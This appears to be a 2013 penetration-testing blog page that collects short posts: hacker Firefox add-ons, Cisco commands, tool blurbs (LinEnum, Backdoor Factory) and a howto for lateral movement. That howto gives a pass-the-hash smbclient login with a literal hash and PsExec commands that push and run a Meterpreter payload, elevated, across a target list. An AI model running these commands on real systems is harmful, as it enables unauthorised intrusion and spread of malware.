Aug 24, 2013

Tools: 11 Firefox Add-ons a Hacker Must Have and use

If you want full detail of all tools, please go to the Source.

1. Tamper Data
https://addons.mozilla.org/en-us/firefox/addon/tamper-data/

2. Firebug
https://addons.mozilla.org/en-US/firefox/addon/firebug/
 
3. Hackbar
https://addons.mozilla.org/en-US/firefox/addon/hackbar/

4. Cookies Manager +
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

5. NoScript
https://addons.mozilla.org/en-us/firefox/addon/noscript/

6. Grease Monkey
https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

7. User Agent Switcher

https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

8. CryptoFox
https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

9. SQL Inject Me
https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/ 

10.  XSS ME
https://addons.mozilla.org/en-us/firefox/addon/xss-me/

11.  Passive Recon

https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
 



Source: http://www.hackingloops.com/2013/08/11-firefox-addons-hacker-must-have-use.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Top Five Cisco IOS Commands

If you want the detail of all command, please go to the Source.

 1. show interfaces
 2. copy running-config startup-config
 3. show ip route
 4. show ip interface brief
 5. show running-config   


Source: http://blog.router-switch.com/2012/08/top-five-cisco-ios-commands-every-network-admin-should-know/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 20, 2013

Howto: Dropping Shell And PSexec

smbclient //192.168.1.120/c$ -U Administrator -p 4ECC0E7568976B7EAAD3B435B51404EE:551E3B3215FFD87F5E037B3E3523D5F6
 
 
 
 
meterpreter > upload /my/local/path/to/metr.exe \\users\\MrClickHappy\\metr.exe
meterpreter > upload /my/local/path/to/PsExec.exe \\users\\MrClickHappy\\PsExec.exe
meterpreter > upload /my/local/path/to/targets.txt \\users\\MrClickHappy\\targets.txt
meterpreter > shell
Process 3052 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\MrClickHappy> PsExec.exe @targets.txt -accepteula -c -f -h -d metr.exe

This command will use the exiting user's credentials to copy the Meterpreter payload to the remote system (-c), overwrite the file if it already exists (-f), run it with elevated permissions (-h), not wait for the process to terminate (-d), and disable the EULA prompt (-accepteula). A list of targets has been provided (@) so the command will keep running and eventually find a winner.


Source: 
http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
https://www.christophertruncer.com/dropping-payloads-with-credentials
/http://www.ampliasecurity.com/research/wce12_uba_ampliasecurity_eng.pdf






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks

Scripted Local Linux Enumeration & Privilege Escalation Checks 

High-level summary of the checks/tasks performed by LinEnum:
  • Kernel and distribution release details
  • System Information:
    • Hostname
    • Networking details:
    • Current IP
    • Default route details
    • DNS server information
  • User Information:
    • Current user details
    • Last logged on users
    • List all users including uid/gid information
    • List root accounts
    • Extract full details for ‘default’ uid’s such as 0, 1000, 1001 etc
    • Attempt to read restricted files i.e. /etc/shadow
    • List current users history files (i.e .bash_history, .nano_history etc.)
  • Privileged access:
    • Determine if /etc/sudoers is accessible
    • Determine if the current user has Sudo access without a password
    • Are known ‘good’ breakout binaries available via Sudo (i.e. nmap, vim etc.)
    • Is root’s home directory accessible
    • List permissions for /home/
  • Environmental:
    • Display current $PATH
  • Jobs/Tasks:
    • List all cron jobs
    • Locate all world-writable cron jobs
    • Locate cron jobs owned by other users of the system
  • Services:
    • List network connections (TCP & UDP)
    • List running processes
    • Lookup and list process binaries and associated permissions
    • List inetd.conf/xined.conf contents and associated binary file permissions
    • List init.d binary permissions
  • Version Information (of the following):
    • Sudo
    • MYSQL
    • Postgres
    • Apache
  • Default/Weak Credentials:
    • Checks for default/weak Postgres accounts
    • Checks for default root/root access to local MYSQL services
  • Searches:
    • Locate all SUID/GUID files
    • Locate all world-writable SUID/GUID files
    • Locate all SUID/GUID files owned by root
    • Locate ‘interesting’ SUID/GUID files (i.e. nmap, vim etc)
    • List all world-writable files
    • Find/list all accessible *.plan files and display contents
    • Find/list all accesible *.rhosts files and display contents
    • Show NFS server details
    • Locate *.conf and *.log files containing keyword supplied at script runtime
    • List all *.conf files located in /etc
    • Locate mail
     
Source: https://github.com/rebootuser/LinEnum



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Malcom - Malware Communication Analyzer

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world.  

Source: https://github.com/tomchop/malcom


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Aug 18, 2013

Tools: The Backdoor Factory

Backdoors win32 PE files, to continue normal file execution (if the shellcode supports it), by patching the exe/dll directly.
Some executables have built in protections, as such this will not work on all PE files. It is advisable that you test target PE files before deploying them to clients or using them in exercises.
Win32 binaries now run on x64 working with ASLR for proper continued execution after shellcode has run.

Source: https://github.com/secretsquirrel/the-backdoor-factory


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Introspy - Monitor app in your iDevice

Introspy - an open-source security profiler for iOS. Introspy is designed to help penetration testers understand what an application does at runtime.

Source: http://isecpartners.github.io/introspy/


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |